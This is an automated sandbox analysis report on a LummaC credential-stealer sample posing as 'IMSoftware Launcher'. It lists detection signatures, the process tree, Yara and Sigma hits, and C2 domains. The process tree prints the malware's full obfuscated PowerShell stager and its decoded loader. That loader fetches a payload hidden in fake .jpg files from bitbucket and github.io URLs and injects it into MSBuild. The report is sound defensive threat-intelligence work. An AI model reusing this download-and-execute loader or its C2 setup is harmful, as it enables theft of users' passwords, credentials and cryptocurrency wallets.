Edit tour

Windows Analysis Report
IMSoftware{Launcher}3.21.exe

Overview

General Information

Sample name:	IMSoftware{Launcher}3.21.exe
Analysis ID:	1663633
MD5:	ea61922dae2d227f2a8541d653801603
SHA1:	89b0a442504b485cb01dc65eff91db22ab11c668
SHA256:	210ef5b2cef2850fac76f9542ef21b3dfd704cf5912a74d7a429563f8d48226b
Tags:	exeLummaStealeruser-aachum
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Powershell download and load assembly

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

Yara detected Powershell download and execute

.NET source code references suspicious native API functions

C2 URLs / IPs found in malware configuration

Found suspicious powershell code related to unpacking or dynamic code loading

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Silenttrinity Stager Msbuild Activity

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

AV process strings found (often used to terminate AV products)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain checking for process token information

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

Queries disk information (often used to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Process Tree

System is w10x64

IMSoftware{Launcher}3.21.exe (PID: 7040 cmdline: "C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe" MD5: EA61922DAE2D227F2A8541D653801603)

cmd.exe (PID: 7136 cmdline: cmd.exe /c 67f525209658e.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wscript.exe (PID: 2920 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67f525209658e.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

powershell.exe (PID: 1432 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZgBz@GQ@ZgBz@GQ@ZgBz@C8@ZgBz@GQ@ZgBk@HM@ZgBz@GQ@ZgBz@GQ@Zg@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@y@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Ck@L@@g@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBv@GY@aQBj@GU@Mw@2@DU@LgBn@Gk@d@Bo@HU@Yg@u@Gk@bw@v@DE@LwB0@GU@cwB0@C4@agBw@Gc@Jw@p@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@9@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@@k@Gw@aQBu@Gs@cw@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@LQBu@GU@I@@k@G4@dQBs@Gw@KQ@g@Hs@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBU@GU@e@B0@C4@RQBu@GM@bwBk@Gk@bgBn@F0@Og@6@FU@V@BG@Dg@LgBH@GU@d@BT@HQ@cgBp@G4@Zw@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@FM@V@BB@FI@V@@+@D4@Jw@7@C@@J@Bl@G4@Z@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@RQBO@EQ@Pg@+@Cc@Ow@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@KQ@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@C0@ZwBl@C@@M@@g@C0@YQBu@GQ@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@C0@ZwB0@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ck@I@B7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@Kw@9@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@QwBv@G0@bQBh@G4@Z@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@UwB1@GI@cwB0@HI@aQBu@Gc@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@L@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@a@@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBt@GE@bgBk@EI@eQB0@GU@cw@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@QwBv@G4@dgBl@HI@d@Bd@Do@OgBG@HI@bwBt@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@UgBl@GY@b@Bl@GM@d@Bp@G8@bg@u@EE@cwBz@GU@bQBi@Gw@eQBd@Do@OgBM@G8@YQBk@Cg@J@Bj@G8@bQBt@GE@bgBk@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@D0@I@BH@GU@d@@t@EM@bwBt@H@@cgBl@HM@cwBl@GQ@QgB5@HQ@ZQBB@HI@cgBh@Hk@I@@t@GI@eQB0@GU@QQBy@HI@YQB5@C@@J@Bl@G4@YwBU@GU@e@B0@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HQ@eQBw@GU@I@@9@C@@J@Bs@G8@YQBk@GU@Z@BB@HM@cwBl@G0@YgBs@Hk@LgBH@GU@d@BU@Hk@c@Bl@Cg@JwB0@GU@cwB0@H@@bwB3@GU@cgBz@Gg@ZQBs@Gw@LgBI@G8@YQBh@GE@YQBh@GE@cwBk@G0@ZQ@n@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bt@GU@d@Bo@G8@Z@@g@D0@I@@k@HQ@eQBw@GU@LgBH@GU@d@BN@GU@d@Bo@G8@Z@@o@Cc@b@Bm@HM@ZwBl@GQ@Z@Bk@GQ@Z@Bk@GQ@YQ@n@Ck@LgBJ@G4@dgBv@Gs@ZQ@o@CQ@bgB1@Gw@b@@s@C@@WwBv@GI@agBl@GM@d@Bb@F0@XQ@g@Cg@Jw@g@HQ@e@B0@C4@SQBl@EE@a@Bm@GE@Zg@v@HM@ZQBs@Gk@ZgBf@GM@aQBs@GI@dQBw@C8@Mg@x@DE@Lg@2@DI@Mg@u@D@@Ng@u@DI@Ng@v@C8@Og@n@Cw@I@@n@D@@Jw@s@C@@JwBT@HQ@YQBy@HQ@dQBw@E4@YQBt@GU@Jw@s@C@@JwBN@HM@YgB1@Gk@b@Bk@Cc@L@@g@Cc@M@@n@Ck@KQB9@H0@';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6656 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/fsdfsdfs/fsdfdsfsdfsdf/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.IeAhfaf/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)

MSBuild.exe (PID: 7584 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

MSBuild.exe (PID: 7592 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

svchost.exe (PID: 2224 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["xcelmodo.run/nahd", "soursopsf.run/gsoiao", "changeaie.top/geps", "easyupgw.live/eosz", "liftally.top/xasj", "upmodini.digital/gokk", "salaccgfa.top/gsooz", "zestmodp.top/zeda"], "Build id": "ccc04d7745fc159dc47db3d9c13da52e790fa62660a48c5dc73f"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000E.00000002.1404835461.00000000039C8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
0000000E.00000002.1398137512.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
Process Memory Space: powershell.exe PID: 1432	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 1432	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x1289e:$b2: ::FromBase64String( 0x12677:$b3: ::UTF8.GetString( 0xce1b1:$s1: -join 0x141626:$s1: -join 0x39295:$s3: reverse 0x3feea:$s3: reverse 0x41ed1:$s3: reverse 0x4cf00:$s3: reverse 0x70437:$s3: reverse 0x7bc75:$s3: reverse 0xe8d92:$s3: reverse 0xe9080:$s3: reverse 0xe979a:$s3: reverse 0xe9f53:$s3: reverse 0xf103e:$s3: reverse 0xf1458:$s3: reverse 0xf1fe0:$s3: reverse 0xf2c8d:$s3: reverse 0x11e425:$s3: reverse 0x1282ec:$s3: reverse 0x12799:$s4: +=
Process Memory Space: powershell.exe PID: 6656	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 6656	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x3951:$b2: ::FromBase64String( 0x349ac:$b2: ::FromBase64String( 0x3abe1:$b2: ::FromBase64String( 0x4a3e1:$b2: ::FromBase64String( 0x4af2f:$b2: ::FromBase64String( 0x372a:$b3: ::UTF8.GetString( 0x34785:$b3: ::UTF8.GetString( 0x3a9ba:$b3: ::UTF8.GetString( 0x4a1ba:$b3: ::UTF8.GetString( 0x4ad08:$b3: ::UTF8.GetString( 0x2e673:$s1: -join 0x59123:$s1: -join 0x59830:$s1: -join 0x4256e:$s3: Reverse 0x42d75:$s3: Reverse 0x42d7f:$s3: Reverse 0x4375b:$s3: Reverse 0x43fbf:$s3: Reverse 0x44765:$s3: Reverse 0x4476e:$s3: Reverse 0x450c6:$s3: Reverse
Process Memory Space: MSBuild.exe PID: 7592	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
14.2.MSBuild.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
14.2.MSBuild.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security

Other

Source	Rule	Description	Author	Strings
amsi64_6656.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZgBz@GQ@ZgBz@GQ@ZgBz@C8@ZgBz@GQ@ZgBk@HM@ZgBz@GQ@ZgBz@GQ@Zg@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@y@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Ck@L@@g@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBv@GY@aQBj@GU@Mw@2@DU@LgBn@Gk@d@Bo@HU@Yg@u@Gk@bw@v@DE@LwB0@GU@cwB0@C4@agBw@Gc@Jw@p@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@9@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@@k@Gw@aQBu@Gs@cw@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@LQBu@GU@I@@k@G4@dQBs@Gw@KQ@g@Hs@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBU@GU@e@B0@C4@RQBu@GM@bwBk@Gk@bgBn@F0@Og@6@FU@V@BG@Dg@LgBH@GU@d@BT@HQ@cgBp@G4@Zw@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@FM@V@BB@FI@V@@+@D4@Jw@7@C@@J@Bl@G4@Z@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@RQBO@EQ@Pg@+@Cc@Ow@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@KQ@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@C0@ZwBl@C@@M@@g@C0@YQBu@GQ@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@C0@ZwB0@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ck@I@B7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@K

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67f525209658e.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67f525209658e.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 67f525209658e.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7136, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67f525209658e.vbs" , ProcessId: 2920, ProcessName: wscript.exe

Sigma detected: Silenttrinity Stager Msbuild Activity

Source: Network Connection

Author: Kiran kumar s, oscd.community: Data: DestinationIp: 104.21.42.7, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7592, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49719

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

